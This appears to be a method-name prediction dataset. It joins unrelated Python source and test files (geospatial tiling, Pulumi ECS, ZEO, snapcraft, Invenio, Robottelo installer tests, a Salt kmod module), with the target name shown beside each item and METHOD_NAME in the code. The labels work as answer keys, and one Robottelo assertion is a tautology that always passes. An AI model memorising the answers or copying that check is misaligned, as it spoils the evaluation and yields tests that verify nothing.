Expand GeoBox such that width and height are multiples of supplied number.
"""
aligny = alignx if aligny is None else aligny
H, W = gbox.shape
return GeoBox(align_up(W, alignx),
align_up(H, aligny),
gbox.affine, gbox.crs)
def zoom_out(gbox: GeoBox, factor: float) -> GeoBox:
"""
factor > 1 --> smaller width/height, fewer but bigger pixels
factor < 1 --> bigger width/height, more but smaller pixels
:returns: GeoBox covering the same region but with bigger pixels (i.e. lower resolution)
"""
from math import ceil
H, W = (max(1, ceil(s/factor)) for s in gbox.shape)
A = gbox.affine*Affine.scale(factor, factor)
return GeoBox(W, H, A, gbox.crs)
def zoom_to(gbox: GeoBox, shape: Tuple[int, int]) -> GeoBox:
"""
:returns: GeoBox covering the same region but with different number of pixels
and therefore resolution.
"""
H, W = gbox.shape
h, w = shape
sx, sy = W/float(w), H/float(h)
A = gbox.affine*Affine.scale(sx, sy)
return GeoBox(w, h, A, gbox.crs)
def rotate(gbox: GeoBox, deg: float) -> GeoBox:
"""
Rotate GeoBox around the center.
It's as if you stick a needle through the center of the GeoBox footprint
and rotate it counter clock wise by supplied number of degrees.
Note that from pixel point of view image rotates the other way. If you have
source image with an arrow pointing right, and you rotate GeoBox 90 degree,
in that view arrow should point down (this is assuming usual case of inverted
y-axis)
"""
h, w = gbox.shape
c0 = gbox.transform*(w*0.5, h*0.5)
A = Affine.rotation(deg, c0)*gbox.transform
return GeoBox(w, h, A, gbox.crs)
def affine_transform_pix(gbox: GeoBox, transform: Affine) -> GeoBox:
"""
Apply affine transform on pixel side.
:param transform: Affine matrix mapping from new pixel coordinate space to
pixel coordinate space of input gbox
:returns: GeoBox of the same pixel shape but covering different region,
pixels in the output gbox relate to input geobox via `transform`
X_old_pix = transform * X_new_pix
"""
H, W = gbox.shape
A = gbox.affine*transform
return GeoBox(W, H, A, gbox.crs)
class GeoboxTiles():
""" Partition GeoBox into sub geoboxes
"""
def __init__(self, box: GeoBox, tile_shape: Tuple[int, int]):
""" Construct from a ``GeoBox``
:param box: source :class:`datacube.utils.geometry.GeoBox`
:param tile_shape: Shape of sub-tiles in pixels (rows, cols)
"""
self._gbox = box
self._tile_shape = tile_shape
self._shape = tuple(math.ceil(float(N)/n)
for N, n in zip(box.shape, tile_shape))
self._cache: Dict[Tuple[int, int], GeoBox] = {}
@property
def base(self) -> GeoBox:
return self._gbox
@property
def shape(self):
""" Number of tiles along each dimension
"""
return self._shape
def _idx_to_slice(self, idx: Tuple[int, int]) -> Tuple[slice, slice]:
def _slice(i, N, n) -> slice:
_in = i*n
if 0 <= _in < N:
return slice(_in, min(_in + n, N))
else:
raise IndexError("Index ({},{})is out of range".format(*idx))
ir, ic = (_slice(i, N, n)
for i, N, n in zip(idx, self._gbox.shape, self._tile_shape))
return (ir, ic)
def chunk_shape(self, idx: Tuple[int, int]) -> Tuple[int, int]:
""" Chunk shape for a given chunk index.
:param idx: (row, col) index
:returns: (nrow, ncols) shape of a tile (edge tiles might be smaller)
:raises: IndexError when index is outside of [(0,0) -> .shape)
"""
def _sz(i: int, n: int, tile_sz: int, total_sz: int) -> int:
if 0 <= i < n - 1: # not edge tile
return tile_sz
elif i == n - 1: # edge tile
return total_sz - (i*tile_sz)
else: # out of index case
raise IndexError("Index ({},{}) is out of range".format(*idx))
n1, n2 = map(_sz, idx, self._shape, self._tile_shape, self._gbox.shape)
return (n1, n2)
def __getitem__(self, idx: Tuple[int, int]) -> GeoBox:
""" Lookup tile by index, index is in matrix access order: (row, col)
:param idx: (row, col) index
:returns: GeoBox of a tile
:raises: IndexError when index is outside of [(0,0) -> .shape)
"""
sub_gbox = self._cache.get(idx, None)
if sub_gbox is not None:
return sub_gbox
roi = self._idx_to_slice(idx)
return self._cache.setdefault(idx, self._gbox[roi])
def range_from_bbox(self, bbox: BoundingBox) -> Tuple[range, range]:
""" Compute rows and columns overlapping with a given ``BoundingBox``
"""
def clamped_range(v1: float, v2: float, N: int) -> range:
_in = clamp(math.floor(v1), 0, N)
_out = clamp(math.ceil(v2), 0, N)
return range(_in, _out)
sy, sx = self._tile_shape
A = Affine.scale(1.0/sx, 1.0/sy)*(~self._gbox.transform)
# A maps from X,Y in meters to chunk index
bbox = bbox.transform(A)
NY, NX = self.shape
xx = clamped_range(bbox.left, bbox.right, NX)
yy = clamped_range(bbox.bottom, bbox.top, NY)
return (yy, xx)
def METHOD_NAME(self, polygon: Geometry) -> Iterable[Tuple[int, int]]:
""" Return tile indexes overlapping with a given geometry.
"""
if self._gbox.crs is None:
poly = polygon
else:
poly = polygon.to_crs(self._gbox.crs)
yy, xx = self.range_from_bbox(poly.boundingbox)
for idx in itertools.product(yy, xx):
gbox = self[idx]
if gbox.extent.intersects(poly):
yield idx |
298,430 | get cluster output | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetClusterResult',
'AwaitableGetClusterResult',
'get_cluster',
'get_cluster_output',
]
@pulumi.output_type
class GetClusterResult:
"""
A collection of values returned by getCluster.
"""
def __init__(__self__, arn=None, cluster_name=None, id=None, pending_tasks_count=None, registered_container_instances_count=None, running_tasks_count=None, service_connect_defaults=None, settings=None, status=None, tags=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if cluster_name and not isinstance(cluster_name, str):
raise TypeError("Expected argument 'cluster_name' to be a str")
pulumi.set(__self__, "cluster_name", cluster_name)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if pending_tasks_count and not isinstance(pending_tasks_count, int):
raise TypeError("Expected argument 'pending_tasks_count' to be a int")
pulumi.set(__self__, "pending_tasks_count", pending_tasks_count)
if registered_container_instances_count and not isinstance(registered_container_instances_count, int):
raise TypeError("Expected argument 'registered_container_instances_count' to be a int")
pulumi.set(__self__, "registered_container_instances_count", registered_container_instances_count)
if running_tasks_count and not isinstance(running_tasks_count, int):
raise TypeError("Expected argument 'running_tasks_count' to be a int")
pulumi.set(__self__, "running_tasks_count", running_tasks_count)
if service_connect_defaults and not isinstance(service_connect_defaults, list):
raise TypeError("Expected argument 'service_connect_defaults' to be a list")
pulumi.set(__self__, "service_connect_defaults", service_connect_defaults)
if settings and not isinstance(settings, list):
raise TypeError("Expected argument 'settings' to be a list")
pulumi.set(__self__, "settings", settings)
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def arn(self) -> str:
"""
ARN of the ECS Cluster
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> str:
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="pendingTasksCount")
def pending_tasks_count(self) -> int:
"""
Number of pending tasks for the ECS Cluster
"""
return pulumi.get(self, "pending_tasks_count")
@property
@pulumi.getter(name="registeredContainerInstancesCount")
def registered_container_instances_count(self) -> int:
"""
The number of registered container instances for the ECS Cluster
"""
return pulumi.get(self, "registered_container_instances_count")
@property
@pulumi.getter(name="runningTasksCount")
def running_tasks_count(self) -> int:
"""
Number of running tasks for the ECS Cluster
"""
return pulumi.get(self, "running_tasks_count")
@property
@pulumi.getter(name="serviceConnectDefaults")
def service_connect_defaults(self) -> Sequence['outputs.GetClusterServiceConnectDefaultResult']:
"""
The default Service Connect namespace
"""
return pulumi.get(self, "service_connect_defaults")
@property
@pulumi.getter
def settings(self) -> Sequence['outputs.GetClusterSettingResult']:
"""
Settings associated with the ECS Cluster
"""
return pulumi.get(self, "settings")
@property
@pulumi.getter
def status(self) -> str:
"""
Status of the ECS Cluster
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
"""
Key-value map of resource tags
"""
return pulumi.get(self, "tags")
class AwaitableGetClusterResult(GetClusterResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetClusterResult(
arn=self.arn,
cluster_name=self.cluster_name,
id=self.id,
pending_tasks_count=self.pending_tasks_count,
registered_container_instances_count=self.registered_container_instances_count,
running_tasks_count=self.running_tasks_count,
service_connect_defaults=self.service_connect_defaults,
settings=self.settings,
status=self.status,
tags=self.tags)
def get_cluster(cluster_name: Optional[str] = None,
tags: Optional[Mapping[str, str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetClusterResult:
"""
The ECS Cluster data source allows access to details of a specific
cluster within an AWS ECS service.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
ecs_mongo = aws.ecs.get_cluster(cluster_name="ecs-mongo-production")
```
:param str cluster_name: Name of the ECS Cluster
:param Mapping[str, str] tags: Key-value map of resource tags
"""
__args__ = dict()
__args__['clusterName'] = cluster_name
__args__['tags'] = tags
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('aws:ecs/getCluster:getCluster', __args__, opts=opts, typ=GetClusterResult).value
return AwaitableGetClusterResult(
arn=pulumi.get(__ret__, 'arn'),
cluster_name=pulumi.get(__ret__, 'cluster_name'),
id=pulumi.get(__ret__, 'id'),
pending_tasks_count=pulumi.get(__ret__, 'pending_tasks_count'),
registered_container_instances_count=pulumi.get(__ret__, 'registered_container_instances_count'),
running_tasks_count=pulumi.get(__ret__, 'running_tasks_count'),
service_connect_defaults=pulumi.get(__ret__, 'service_connect_defaults'),
settings=pulumi.get(__ret__, 'settings'),
status=pulumi.get(__ret__, 'status'),
tags=pulumi.get(__ret__, 'tags'))
@_utilities.lift_output_func(get_cluster)
def METHOD_NAME(cluster_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Optional[Mapping[str, str]]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetClusterResult]:
"""
The ECS Cluster data source allows access to details of a specific
cluster within an AWS ECS service.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
ecs_mongo = aws.ecs.get_cluster(cluster_name="ecs-mongo-production")
```
:param str cluster_name: Name of the ECS Cluster
:param Mapping[str, str] tags: Key-value map of resource tags
"""
... |
298,431 | remove pidfile | import unittest
from unittest import mock
from ZEO.runzeo import ZEOServer
class TestStorageServer:
def __init__(self, fail_create_server):
self.called = []
if fail_create_server:
raise RuntimeError()
def close(self):
self.called.append("close")
class TestZEOServer(ZEOServer):
def __init__(self, fail_create_server=False, fail_loop_forever=False):
ZEOServer.__init__(self, None)
self.called = []
self.fail_create_server = fail_create_server
self.fail_loop_forever = fail_loop_forever
def setup_default_logging(self):
self.called.append("setup_default_logging")
def check_socket(self):
self.called.append("check_socket")
def clear_socket(self):
self.called.append("clear_socket")
def make_pidfile(self):
self.called.append("make_pidfile")
def open_storages(self):
self.called.append("open_storages")
def setup_signals(self):
self.called.append("setup_signals")
def create_server(self):
self.called.append("create_server")
self.server = TestStorageServer(self.fail_create_server)
def loop_forever(self):
self.called.append("loop_forever")
if self.fail_loop_forever:
raise RuntimeError()
def close_server(self):
self.called.append("close_server")
ZEOServer.close_server(self)
def METHOD_NAME(self):
self.called.append("remove_pidfile")
class AttributeErrorTests(unittest.TestCase):
def testFailCreateServer(self):
#
# Fix AttributeError: 'ZEOServer' object has no attribute
# 'server' in ZEOServer.main
#
# Demonstrate the AttributeError
zeo = TestZEOServer(fail_create_server=True)
self.assertRaises(RuntimeError, zeo.main)
class CloseServerTests(unittest.TestCase):
def testCallSequence(self):
# The close_server hook is called after loop_forever
# has returned
zeo = TestZEOServer()
zeo.main()
self.assertEqual(zeo.called, [
"setup_default_logging",
"check_socket",
"clear_socket",
"make_pidfile",
"open_storages",
"setup_signals",
"create_server",
"loop_forever",
"close_server", # New
"clear_socket",
"remove_pidfile",
])
# The default implementation closes the storage server
self.assertEqual(hasattr(zeo, "server"), True)
self.assertEqual(zeo.server.called, ["close"])
def testFailLoopForever(self):
# The close_server hook is called if loop_forever exits
# with an exception
zeo = TestZEOServer(fail_loop_forever=True)
self.assertRaises(RuntimeError, zeo.main)
self.assertEqual(zeo.called, [
"setup_default_logging",
"check_socket",
"clear_socket",
"make_pidfile",
"open_storages",
"setup_signals",
"create_server",
"loop_forever",
"close_server",
"clear_socket",
"remove_pidfile",
])
# The storage server has been closed
self.assertEqual(hasattr(zeo, "server"), True)
self.assertEqual(zeo.server.called, ["close"])
def testFailCreateServer(self):
# The close_server hook is called if create_server exits
# with an exception
zeo = TestZEOServer(fail_create_server=True)
self.assertRaises(RuntimeError, zeo.main)
self.assertEqual(zeo.called, [
"setup_default_logging",
"check_socket",
"clear_socket",
"make_pidfile",
"open_storages",
"setup_signals",
"create_server",
"close_server",
"clear_socket",
"remove_pidfile",
])
# The server attribute is present but None
self.assertEqual(hasattr(zeo, "server"), True)
self.assertEqual(zeo.server, None)
@mock.patch('os.unlink')
class TestZEOServerSocket(unittest.TestCase):
def _unlinked(self, unlink, options):
server = ZEOServer(options)
server.clear_socket()
unlink.assert_called_once()
def _not_unlinked(self, unlink, options):
server = ZEOServer(options)
server.clear_socket()
unlink.assert_not_called()
def test_clear_with_native_str(self, unlink):
class Options:
address = "a str that does not exist"
self._unlinked(unlink, Options)
def test_clear_with_unicode_str(self, unlink):
class Options:
address = "a str that does not exist"
self._unlinked(unlink, Options)
def test_clear_with_bytes(self, unlink):
class Options:
address = b'a byte str that does not exist'
# bytes are not a string type under Py3
assertion = self._not_unlinked
assertion(unlink, Options)
def test_clear_with_tuple(self, unlink):
class Options:
address = ('abc', 1)
self._not_unlinked(unlink, Options) |
298,432 | test bilinear 1 | #!/usr/bin/env python
"""
Unit test for the bilinear recursive bisection function found in
wagl.interpolation.bilinear
"""
from __future__ import absolute_import
import unittest
import numpy
import math
from wagl.interpolation import bilinear, subdivide, indices, interpolate_block
class BLRBTest(unittest.TestCase):
def setUp(self):
self.origin = (0, 0)
self.shape = (16, 32) # (nrows, ncols)
def test_indices(self):
t = indices(self.origin, self.shape)
self.assertEqual(t, (0, 15, 0, 31))
t = indices((2, 3), (3, 4))
self.assertEqual(t, (2, 4, 3, 6))
def test_subdivide(self):
d = subdivide(self.origin, self.shape)
self.assertEqual(sorted(d.keys()), ["LL", "LR", "UL", "UR"])
self.assertEqual(d["UL"], [(0, 0), (0, 16), (8, 0), (8, 16)])
self.assertEqual(d["UR"], [(0, 16), (0, 31), (8, 16), (8, 31)])
self.assertEqual(d["LL"], [(8, 0), (8, 16), (15, 0), (15, 16)])
self.assertEqual(d["LR"], [(8, 16), (8, 31), (15, 16), (15, 31)])
def test_bilinear_0(self):
x = math.pi
a = bilinear((5, 5), x, x, x, x)
self.assertEqual(a[0, 0], x)
self.assertEqual(a[0, 4], x)
self.assertEqual(a[4, 4], x)
self.assertEqual(a[2, 2], x)
self.assertEqual(a[4, 0], x)
def METHOD_NAME(self):
a = bilinear((5, 5), 0.0, 1.0, 1.0, 0.0)
# print '\n', a
self.assertEqual(a[0, 0], 0.0)
self.assertEqual(a[0, 4], 1.0)
self.assertEqual(a[4, 0], 0.0)
self.assertEqual(a[2, 2], 0.5)
self.assertEqual(a[4, 4], 1.0)
def test_bilinear_2(self):
a = bilinear((5, 5), 0.0, 1.0, 2.0, 1.0)
# print '\n', a
self.assertEqual(a[0, 0], 0.0)
self.assertEqual(a[0, 4], 1.0)
self.assertEqual(a[4, 0], 1.0)
self.assertEqual(a[2, 2], 1.0)
self.assertEqual(a[4, 4], 2.0)
def test_interpolate_block_0(self):
def f(i, j):
return float(i * j)
b = interpolate_block((0, 0), (5, 5), f, grid=None)
# print '\n', b
self.assertEqual(b[0, 0], 0.0)
self.assertEqual(b[0, 4], 0.0)
self.assertEqual(b[4, 0], 0.0)
self.assertEqual(b[2, 2], 4.0)
self.assertEqual(b[4, 4], 16.0)
def test_interpolate_block_1(self):
def f(i, j):
return float(i * j)
b = interpolate_block((0, 0), (5, 11), f, grid=None)
# print '\n', b
self.assertEqual(b[0, 0], 0.0)
self.assertEqual(b[0, -1], 0.0)
self.assertEqual(b[-1, 0], 0.0)
self.assertEqual(b[-1, -1], 40.0)
self.assertEqual(b[-2, -1], 30.0)
self.assertEqual(b[-1, -2], 36.0)
def test_interpolate_block_2(self):
def f(i, j):
return float(i + j)
origin = (0, 0)
shape = (3, 5) # nrows, ncols
fUL = f(0, 0) # 0.0
fUR = f(0, 4) # 4.0
fLL = f(2, 0) # 2.0
fLR = f(2, 4) # 6.0
a = bilinear(shape, fUL, fUR, fLR, fLL)
# print '\n', a
self.assertEqual(a[0, 0], fUL)
self.assertEqual(a[0, -1], fUR)
self.assertEqual(a[-1, -1], fLR)
self.assertEqual(a[-1, 0], fLL)
b = interpolate_block(origin, shape, f, grid=None)
# print '\n', b
self.assertTrue(numpy.max(b - a) < 0.000001)
def test_interpolate_block_3(self):
def f(i, j):
return float(i) ** 2 * math.sqrt(float(j))
origin = (0, 0)
shape = (3, 5) # nrows, ncols
fUL = f(0, 0)
fUR = f(0, 4)
fLL = f(2, 0)
fLR = f(2, 4)
a = bilinear(shape, fUL, fUR, fLR, fLL)
# print '\n', a
self.assertEqual(a[0, 0], fUL)
self.assertEqual(a[0, -1], fUR)
self.assertEqual(a[-1, -1], fLR)
self.assertEqual(a[-1, 0], fLL)
b = interpolate_block(origin, shape, f, grid=None)
# print '\n', b
self.assertTrue(numpy.max(b - a) < 0.000001)
def the_suite():
"""Returns a test suite of all the tests in this module."""
test_classes = [BLRBTest]
suite_list = map(unittest.defaultTestLoader.loadTestsFromTestCase, test_classes)
suite = unittest.TestSuite(suite_list)
return suite
#
# Run unit tests if in __main__
#
if __name__ == "__main__":
unittest.TextTestRunner(verbosity=2).run(the_suite()) |
298,433 | test provides stage | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2018 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import Equals
from snapcraft_legacy import project
from snapcraft_legacy.internal.project_loader import inspection
from tests.legacy import unit
class ProvidesTest(unit.TestCase):
def setUp(self):
super().setUp()
self.part1 = self.load_part("part1")
self.part2 = self.load_part("part2")
self.parts = [self.part1, self.part2]
self.project = project.Project()
self.part1.makedirs()
self.part2.makedirs()
def METHOD_NAME(self):
file1_path = os.path.join(self.project.stage_dir, "file1")
file2_path = os.path.join(self.project.stage_dir, "file2")
self.part1.mark_stage_done({"file1"}, set())
self.part2.mark_stage_done({"file2"}, set())
for file_path in (file1_path, file2_path):
open(file_path, "w").close()
self.assertThat(
inspection.provides(file1_path, self.project, self.parts),
Equals({self.part1}),
)
self.assertThat(
inspection.provides(file2_path, self.project, self.parts),
Equals({self.part2}),
)
def test_provides_prime(self):
file1_path = os.path.join(self.project.prime_dir, "file1")
file2_path = os.path.join(self.project.prime_dir, "file2")
self.part1.mark_prime_done({"file1"}, set(), set(), set())
self.part2.mark_prime_done({"file2"}, set(), set(), set())
open(file1_path, "w").close()
open(file2_path, "w").close()
self.assertThat(
inspection.provides(file1_path, self.project, self.parts),
Equals({self.part1}),
)
self.assertThat(
inspection.provides(file2_path, self.project, self.parts),
Equals({self.part2}),
)
def test_provides_dir(self):
dir_path = os.path.join(self.project.stage_dir, "dir")
file1_path = os.path.join(dir_path, "file1")
file2_path = os.path.join(dir_path, "file2")
self.part1.mark_stage_done({os.path.join("dir", "file1")}, {"dir"})
self.part2.mark_stage_done({os.path.join("dir", "file2")}, {"dir"})
for file_path in (file1_path, file2_path):
os.makedirs(os.path.dirname(file_path), exist_ok=True)
open(file_path, "w").close()
self.assertThat(
inspection.provides(dir_path, self.project, self.parts),
Equals({self.part1, self.part2}),
)
def test_provides_file_outside_stage_or_prime(self):
file_path = os.path.join(self.part1.part_source_dir, "file")
open(file_path, "w").close()
raised = self.assertRaises(
inspection.errors.ProvidesInvalidFilePathError,
inspection.provides,
file_path,
self.project,
self.parts,
)
self.assertThat(raised.path, Equals(file_path))
def test_provides_untracked_file(self):
file_path = os.path.join(self.project.stage_dir, "file")
open(file_path, "w").close()
raised = self.assertRaises(
inspection.errors.UntrackedFileError,
inspection.provides,
file_path,
self.project,
self.parts,
)
self.assertThat(raised.path, Equals(file_path))
def test_provides_no_such_file(self):
file_path = os.path.join(self.project.stage_dir, "foo")
raised = self.assertRaises(
inspection.errors.NoSuchFileError,
inspection.provides,
file_path,
self.project,
self.parts,
)
self.assertThat(raised.path, Equals(file_path)) |
298,434 | app codemeta config | # -*- coding: utf-8 -*-
#
# Copyright (C) 2023 CERN.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""CodeMeta specific test configs."""
import pytest
from invenio_access.permissions import system_identity
from invenio_vocabularies.proxies import current_service as vocabulary_service
from invenio_vocabularies.records.api import Vocabulary
from invenio_rdm_records.cli import (
create_records_custom_field,
custom_field_exists_in_records,
)
from invenio_rdm_records.contrib.codemeta.custom_fields import (
CODEMETA_CUSTOM_FIELDS,
CODEMETA_FACETS,
CODEMETA_NAMESPACE,
)
from invenio_rdm_records.proxies import current_rdm_records_service
from invenio_rdm_records.records.api import RDMDraft, RDMRecord
@pytest.fixture(scope="module")
def custom_field_exists(cli_runner):
"""Factory fixture, tests whether a given custom field exists."""
def _custom_field_exists(cf_name):
return cli_runner(custom_field_exists_in_records, "-f", cf_name)
return _custom_field_exists
@pytest.fixture(scope="function")
def initialise_custom_fields(app, location, db, search_clear, cli_runner):
"""Fixture initialises custom fields."""
return cli_runner(create_records_custom_field)
@pytest.fixture(scope="function")
def initialise_codemeta_custom_fields(
cli_runner, METHOD_NAME, search_clear, db, location, running_app
):
"""Initialised codemeta custom fields."""
app = running_app.app
original_config = app.config.copy()
app.config = {**app.config, **METHOD_NAME}
yield cli_runner(create_records_custom_field)
app.config = original_config
@pytest.fixture(scope="session")
def METHOD_NAME(
codemeta_cf_facetted_term,
):
"""Yields the app config fixture with codemeta CF specific configs injected."""
code_meta_configs = {
"RDM_CUSTOM_FIELDS": CODEMETA_CUSTOM_FIELDS,
"RDM_NAMESPACES": CODEMETA_NAMESPACE,
"RDM_FACETS": CODEMETA_FACETS,
"RDM_SEARCH": {
"facets": [codemeta_cf_facetted_term],
},
}
return code_meta_configs
@pytest.fixture(scope="module")
def service():
"""Rdm records service instance."""
return current_rdm_records_service
@pytest.fixture(scope="function")
def codemeta_development_status(running_app):
"""Creates and retrieves a vocabulary type."""
v = vocabulary_service.create_type(system_identity, "code:developmentStatus", "ds")
return v
@pytest.fixture(scope="session")
def codemeta_development_status_vocabulary_data():
"""Fixture returns 'codemeta:developmentStatus' vocabulary data."""
return {
"id": "concept",
"title": {
"en": "Concept",
},
"description": {
"en": "Minimal or no implementation has been done yet, or the repository is only intended to be a limited example, demo, or proof-of-concept."
},
"type": "code:developmentStatus",
}
@pytest.fixture(scope="function")
def codemeta_development_status_vocabulary(
codemeta_development_status,
codemeta_development_status_vocabulary_data,
):
"""Creates and retrieves controlled vocabulary 'development status'."""
record = vocabulary_service.create(
identity=system_identity,
data=codemeta_development_status_vocabulary_data,
)
Vocabulary.index.refresh() # Refresh the index
return record
@pytest.fixture(scope="session")
def codemeta_cf_name():
"""Example of a codemeta custom field name."""
return "code:developmentStatus"
@pytest.fixture(scope="session")
def codemeta_cf_value():
"""Example of a codemeta custom field value (from controlled vocabulary)."""
return "concept"
@pytest.fixture(scope="session")
def codemeta_cf_facetted_term():
"""Example of a codemeta custom field term that is used as a facet term."""
return "developmentStatus"
@pytest.fixture(scope="function")
def minimal_codemeta_record(minimal_record, codemeta_cf_name, codemeta_cf_value):
"""Represents a record containing codemeta fields (custom fields)."""
return {
**minimal_record,
"custom_fields": {codemeta_cf_name: {"id": codemeta_cf_value}},
}
@pytest.fixture(scope="function")
def codemeta_record(
codemeta_development_status_vocabulary,
db,
minimal_codemeta_record,
service,
search_clear,
superuser_identity,
):
"""Creates a record with codemeta custom fields added.
The record is teared down with the db fixture, when the session is destroyed.
Record's indexed document is deleted by the fixture "search_clear".
"""
draft = service.create(superuser_identity, minimal_codemeta_record)
record = service.publish(id_=draft.id, identity=superuser_identity)
RDMRecord.index.refresh()
return record
# Search teardown is taken care by 'search_clear' fixture
# DB teardown is taken care by 'db' fixture |
298,435 | set random fqdn | """Smoke tests to check installation health
:Requirement: Installer
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: Installer
:Team: Platform
:TestType: Functional
:CaseImportance: Critical
:Upstream: No
"""
import pytest
from fauxfactory import gen_domain
from fauxfactory import gen_string
from robottelo.config import settings
from robottelo.utils.installer import InstallerCommand
pytestmark = pytest.mark.destructive
@pytest.fixture
def METHOD_NAME(target_sat):
shortname = gen_string('alpha')
new_domain = gen_domain()
target_sat.execute(
f'echo "search {new_domain}" >> /etc/resolv.conf; hostnamectl set-hostname {shortname}'
)
yield shortname, new_domain
target_sat.execute(f'hostnamectl set-hostname {target_sat.hostname}')
def test_installer_sat_pub_directory_accessibility(target_sat):
"""Verify the public directory accessibility from satellite url after disabling it from
the custom-hiera
:id: 2ef78840-098c-4be2-a9e5-db60f16bb803
:steps:
1. Check the public directory accessibility from http and https satellite url
2. Add the foreman_proxy_content::pub_dir::pub_dir_options:"+FollowSymLinks -Indexes"
in custom-hiera.yaml file.
3. Run the satellite-installer.
4. Check the public directory accessibility from http and https satellite url
:expectedresults: Public directory accessibility from http and https satellite url.
1. It should be accessible if accessibility is enabled(by default it is enabled).
2. It should not be accessible if accessibility is disabled in custom_hiera.yaml file.
:CaseImportance: High
:CaseLevel: System
:BZ: 1960801
:customerscenario: true
"""
custom_hiera_location = '/etc/foreman-installer/custom-hiera.yaml'
custom_hiera_settings = (
'foreman_proxy_content::pub_dir::pub_dir_options: "+FollowSymLinks -Indexes"'
)
http_curl_command = f'curl -i {target_sat.url.replace("https", "http")}/pub/ -k'
https_curl_command = f'curl -i {target_sat.url}/pub/ -k'
for command in [http_curl_command, https_curl_command]:
accessibility_check = target_sat.execute(command)
assert 'HTTP/1.1 200 OK' or 'HTTP/2 200 ' in accessibility_check.stdout.split('\r\n')
target_sat.get(
local_path='custom-hiera-satellite.yaml',
remote_path=f'{custom_hiera_location}',
)
_ = target_sat.execute(f'echo {custom_hiera_settings} >> {custom_hiera_location}')
command_output = target_sat.execute('satellite-installer', timeout='20m')
assert 'Success!' in command_output.stdout
for command in [http_curl_command, https_curl_command]:
accessibility_check = target_sat.execute(command)
assert 'HTTP/1.1 200 OK' or 'HTTP/2 200 ' not in accessibility_check.stdout.split('\r\n')
target_sat.put(
local_path='custom-hiera-satellite.yaml',
remote_path=f'{custom_hiera_location}',
)
command_output = target_sat.execute('satellite-installer', timeout='20m')
assert 'Success!' in command_output.stdout
def test_installer_inventory_plugin_update(target_sat):
"""DB consistency should not break after enabling the inventory plugin flags
:id: a2b66d38-e819-428f-9529-23bed398c916
:steps:
1. Enable the cloud inventory plugin flag
:expectedresults: inventory flag should be updated successfully without any db consistency
error.
:CaseImportance: High
:CaseLevel: System
:BZ: 1863597
:customerscenario: true
"""
target_sat.create_custom_repos(rhel7=settings.repos.rhel7_os)
installer_cmd = target_sat.install(
InstallerCommand(
'enable-foreman-plugin-rh-cloud',
foreman_proxy_plugin_remote_execution_script_install_key=['true'],
)
)
assert 'Success!' in installer_cmd.stdout
verify_rhcloud_flag = target_sat.install(
InstallerCommand(help='|grep "\'foreman_plugin_rh_cloud\' puppet module (default: true)"')
)
assert 'true' in verify_rhcloud_flag.stdout
verify_proxy_plugin_flag = target_sat.install(
InstallerCommand(
**{'full-help': '| grep -A1 foreman-proxy-plugin-remote-execution-script-install-key'}
)
)
assert '(current: true)' in verify_proxy_plugin_flag.stdout
def test_positive_mismatched_satellite_fqdn(target_sat, METHOD_NAME):
"""The satellite-installer should display the mismatched FQDN
:id: 264910ca-23c8-4192-a993-24bc04994a4c
:steps:
1. Set incorrect satellite hostname.
2. assert that output of 'facter fqdn' and 'hostname --fqdn' is different.
3. Run satellite-installer.
4. Assert that satellite-installer command displays mismatched FQDN.
:expectedresults: The satellite-installer should display the mismatched FQDN.
"""
shortname, new_domain = METHOD_NAME
facter_command_output = target_sat.execute('facter fqdn').stdout.strip()
hostname_command_output = target_sat.execute('hostname --fqdn').stdout.strip()
assert facter_command_output == f'{shortname}.{new_domain}'
assert hostname_command_output == shortname
assert facter_command_output != hostname_command_output
warning_message = (
f"Output of 'facter fqdn' "
f"({facter_command_output}) is different from 'hostname -f' "
f"({hostname_command_output})"
)
installer_command_output = target_sat.execute('satellite-installer').stderr
assert warning_message in str(installer_command_output) |
298,436 | available | """
Module to manage FreeBSD kernel modules
"""
import os
import re
import salt.utils.files
# Define the module's virtual name
__virtualname__ = "kmod"
_LOAD_MODULE = '{0}_load="YES"'
_LOADER_CONF = "/boot/loader.conf"
_MODULE_RE = '^{0}_load="YES"'
_MODULES_RE = r'^(\w+)_load="YES"'
def __virtual__():
"""
Only runs on FreeBSD systems
"""
if __grains__["kernel"] == "FreeBSD":
return __virtualname__
return (
False,
"The freebsdkmod execution module cannot be loaded: only available on FreeBSD"
" systems.",
)
